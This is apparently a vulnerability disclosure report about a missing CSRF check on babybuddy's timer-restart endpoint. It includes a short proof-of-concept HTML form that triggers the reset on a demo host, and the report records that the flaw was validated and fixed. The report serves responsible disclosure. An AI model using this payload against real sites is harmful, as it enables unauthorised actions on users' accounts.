Cross-Site Request Forgery (CSRF) in babybuddy/babybuddy

Valid

Reported on

Jul 30th 2021

✍️ Description

You don't check CSRF token in following endpoint /timers/1/restart/ with PoC.html attacker able to reset timer with id equal to 1.

🕵️‍♂️ Proof of Concept

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://demo.baby-buddy.net/timers/1/restart/">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

💥 Impact

This vulnerability is capable of reset any timer.

Occurrences

urls.py L96

We have contacted a member of the babybuddy team and are waiting to hear back 2 years ago

Christopher Charbonneau Wells validated this vulnerability 2 years ago

amammad has been awarded the disclosure bounty

The fix bounty is now up for grabs

Christopher Charbonneau Wells marked this as fixed with commit c2513f 2 years ago

Christopher Charbonneau Wells has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation